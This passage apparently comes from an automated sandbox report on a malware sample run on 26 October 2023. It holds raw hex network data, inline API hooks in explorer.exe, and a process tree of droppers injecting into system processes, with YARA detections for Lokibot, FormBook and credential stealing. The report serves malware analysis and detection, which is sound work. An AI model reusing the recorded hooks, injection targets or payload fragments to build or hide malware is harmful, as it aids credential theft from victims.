68 2e 1f 7e c9 63 90 42 6e d4 04 4e 92 e9 be 84 41 47 eb 3f c4 0b 9e 04
                                                                              Data Ascii: ~0@*'%Za"(xz PXaeq&#5'WTor;1c;h,qXcSm])=-YIiwRo%A\:8_E)J:W1Iv<@Cn_@|"14~A(Icl01j976vY(V!&=Kh.~cBnNAG?
                                                                              2023-10-26 07:46:00 UTC9915INData Raw: f1 ff e0 7f 4e 3f f8 b0 77 c1 16 c1 56 cc 74 2b 0b ce cb 8f 44 de ae a8 e0 74 e3 fb 55 bd 5e 65 58 68 50 17 6b 7b 6f 34 e5 02 19 29 c2 58 5d 4f 21 2e ff 9c bd 44 2a 17 79 b2 90 28 58 ff 0a 91 66 f7 7f f6 02 d4 3b e0 06 d8 46 27 e9 71 5f 11 a6 03 ec 2b 55 20 81 44 09 2c 49 b7 7f 5f ba d1 09 0c 5f 1c 6e 5c 5b 19 90 28 58 19 d6 30 45 8b 87 85 27 d0 07 30 18 92 37 a0 dd 0e cc 00 79 d7 11 1e b6 07 33 1a 09 e5 46 81 30 00 14 dc 7c 90 98 00 3e 44 0e 07 a6 76 97 91 1d 9c e8 77 40 a9 ca 9f 19 dc 1d 00 eb 7c ed d6 a5 68 85 c3 1f ea 66 f5 47 47 b2 d3 70 92 aa 63 67 00 71 34 f0 58 2a f1 5e c8 00 10 bb 41 1b a9 89 0a 28 00 12 35 44 27 d2 0b f1 ec 00 7b 9f 0e 02 0f 81 17 5c 3e 20 84 00 e4 ce c8 7e fc 51 ad 00 3a e6 90 f0 68 e9 1e a3 7a 0e 00 db d5 08 a1 ed ac 0d 27 0f
                                                                              Data Ascii: N?wVt+DtU^eXhPk{o4)X]O!.D*y(Xf;F'q_+U D,I__n\[(X0E'07y3F0|>Dvw@|hfGGpcgq4X*^A(5D'{\> ~Q:hz'
                                                                              2023-10-26 07:46:00 UTC9931INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii:


                                                                              Code Manipulations

                                                                              Function NameHook TypeActive in Processes
                                                                              PeekMessageAINLINEexplorer.exe
                                                                              PeekMessageWINLINEexplorer.exe
                                                                              GetMessageWINLINEexplorer.exe
                                                                              GetMessageAINLINEexplorer.exe
                                                                              Function NameHook TypeNew Data
                                                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE9
                                                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE9
                                                                              GetMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE9
                                                                              GetMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE9

                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:09:45:50
                                                                              Start date:26/10/2023
                                                                              Path:C:\Users\user\Desktop\New_Text_Document.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Users\user\Desktop\New_Text_Document.exe
                                                                              Imagebase:0xf90000
                                                                              File size:4'608 bytes
                                                                              MD5 hash:A239A27C2169AF388D4F5BE6B52F272C
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:2
                                                                              Start time:09:45:50
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff75da10000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:3
                                                                              Start time:09:45:53
                                                                              Start date:26/10/2023
                                                                              Path:C:\Users\user\Desktop\a\audiodgse.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\a\audiodgse.exe"
                                                                              Imagebase:0x120000
                                                                              File size:685'568 bytes
                                                                              MD5 hash:699B84A4A3C73A574BC51F461AD209DB
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 74%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:4
                                                                              Start time:09:45:53
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                              Imagebase:0x7ff7b4ee0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:09:45:56
                                                                              Start date:26/10/2023
                                                                              Path:C:\Users\user\Desktop\a\sbinzx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\a\sbinzx.exe"
                                                                              Imagebase:0x3f0000
                                                                              File size:582'656 bytes
                                                                              MD5 hash:FC8B3A3005CDC80CE19AF33A57010FA8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.1287513905.0000000003AEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1287513905.0000000003AEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1287513905.0000000003AEE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.1287513905.0000000003AEE000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.1287513905.0000000003AEE000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Antivirus matches:
                                                                              • Detection: 22%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:6
                                                                              Start time:09:45:56
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                              Imagebase:0x7ff7b4ee0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:09:45:56
                                                                              Start date:26/10/2023
                                                                              Path:C:\Users\user\Desktop\a\sbinzx.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Users\user\Desktop\a\sbinzx.exe
                                                                              Imagebase:0xe0000
                                                                              File size:582'656 bytes
                                                                              MD5 hash:FC8B3A3005CDC80CE19AF33A57010FA8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:8
                                                                              Start time:09:45:56
                                                                              Start date:26/10/2023
                                                                              Path:C:\Users\user\Desktop\a\audiodgse.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\a\audiodgse.exe
                                                                              Imagebase:0x4b0000
                                                                              File size:685'568 bytes
                                                                              MD5 hash:699B84A4A3C73A574BC51F461AD209DB
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1375358332.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1375358332.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1369508767.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1369508767.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:09:45:57
                                                                              Start date:26/10/2023
                                                                              Path:C:\Users\user\Desktop\a\sbinzx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\a\sbinzx.exe
                                                                              Imagebase:0xfe0000
                                                                              File size:582'656 bytes
                                                                              MD5 hash:FC8B3A3005CDC80CE19AF33A57010FA8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:10
                                                                              Start time:09:45:57
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                              Imagebase:0x7ff7b4ee0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              Target ID:11
                                                                              Start time:09:45:57
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\SgrmBroker.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                              Imagebase:0x7ff729900000
                                                                              File size:329'504 bytes
                                                                              MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              Target ID:12
                                                                              Start time:09:45:57
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\explorer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                              Imagebase:0x7ff70ffd0000
                                                                              File size:5'141'208 bytes
                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 0000000C.00000002.2535197131.000000000E498000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:13
                                                                              Start time:09:45:57
                                                                              Start date:26/10/2023
                                                                              Path:C:\Users\user\Desktop\a\autolog.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\a\autolog.exe"
                                                                              Imagebase:0x400000
                                                                              File size:369'593 bytes
                                                                              MD5 hash:5A7848FDBC0CA7BAB05257E730497197
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 78%, ReversingLabs
                                                                              Has exited:true

                                                                              Target ID:14
                                                                              Start time:09:45:57
                                                                              Start date:26/10/2023
                                                                              Path:C:\Program Files (x86)\rGrAmoMoqMwuTqnZRCybwYGKPnpcLDMjCfBRghbDIpwgyLgTSyrgXdXQGZfChuqeGs\LkeNkIcFYvnikmw.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\rGrAmoMoqMwuTqnZRCybwYGKPnpcLDMjCfBRghbDIpwgyLgTSyrgXdXQGZfChuqeGs\LkeNkIcFYvnikmw.exe"
                                                                              Imagebase:0x4b0000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2490251590.0000000003E00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.2490251590.0000000003E00000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                              Has exited:false

                                                                              Target ID:15
                                                                              Start time:09:45:57
                                                                              Start date:26/10/2023
                                                                              Path:C:\Users\user\AppData\Local\Temp\pznhcda.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user~1\AppData\Local\Temp\pznhcda.exe"
                                                                              Imagebase:0x400000
                                                                              File size:222'208 bytes
                                                                              MD5 hash:43100AE87F6E6802E3D65F8C79BA030B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_NSISDropper, Description: Yara detected NSISDropper, Source: 0000000F.00000002.1298666663.0000000000570000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.1299234736.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.1299234736.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.1299234736.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.1299234736.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.1299234736.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 78%, ReversingLabs
                                                                              Has exited:true

                                                                              Target ID:16
                                                                              Start time:09:45:58
                                                                              Start date:26/10/2023
                                                                              Path:C:\Users\user\AppData\Local\Temp\pznhcda.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user~1\AppData\Local\Temp\pznhcda.exe
                                                                              Imagebase:0x400000
                                                                              File size:222'208 bytes
                                                                              MD5 hash:43100AE87F6E6802E3D65F8C79BA030B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.1373397267.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.1373397267.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.1373397267.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.1373397267.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.1373397267.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.1378872385.0000000000D30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.1378872385.0000000000D30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.1378872385.0000000000D30000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.1378872385.0000000000D30000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.1378872385.0000000000D30000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.1368928520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.1368928520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.1368928520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.1368928520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.1368928520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Has exited:true

                                                                              Target ID:17
                                                                              Start time:09:45:59
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\SysWOW64\poqexec.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\SysWOW64\poqexec.exe
                                                                              Imagebase:0x140000
                                                                              File size:392'704 bytes
                                                                              MD5 hash:3D570C0E68734A7B81BE47313E442974
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:18
                                                                              Start time:09:45:59
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                              Imagebase:0x7ff7b4ee0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:19
                                                                              Start time:09:45:59
                                                                              Start date:26/10/2023
                                                                              Path:C:\Users\user\Desktop\a\setup.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\Desktop\a\setup.exe"
                                                                              Imagebase:0x7ff7f0ad0000
                                                                              File size:10'177'592 bytes
                                                                              MD5 hash:8A22C4B4E8B911A51322DFD78FE799C4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 52%, ReversingLabs
                                                                              Has exited:true

                                                                              Target ID:20
                                                                              Start time:09:45:59
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\SysWOW64\raserver.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                              Imagebase:0x7ff75da10000
                                                                              File size:107'520 bytes
                                                                              MD5 hash:D1053D114847677185F248FF98C3F255
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.2491293063.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.2491293063.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.2475106067.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.2475106067.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.2489028637.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.2489028637.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              Has exited:false

                                                                              Target ID:21
                                                                              Start time:09:46:00
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                              Imagebase:0x7ff7b4ee0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:22
                                                                              Start time:09:46:00
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
                                                                              Imagebase:0x7ff7b4ee0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:23
                                                                              Start time:09:46:01
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                                                              Imagebase:0x400000
                                                                              File size:86'528 bytes
                                                                              MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.2485022491.00000000044B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.2485022491.00000000044B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000017.00000002.2485022491.00000000044B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.2485022491.00000000044B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.2485022491.00000000044B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.2485599667.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.2485599667.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000017.00000002.2485599667.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.2485599667.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.2485599667.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.2475619657.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.2475619657.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000017.00000002.2475619657.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.2475619657.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.2475619657.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Has exited:false

                                                                              Target ID:25
                                                                              Start time:09:46:01
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                                              Imagebase:0x7ff7b4ee0000
                                                                              File size:55'320 bytes
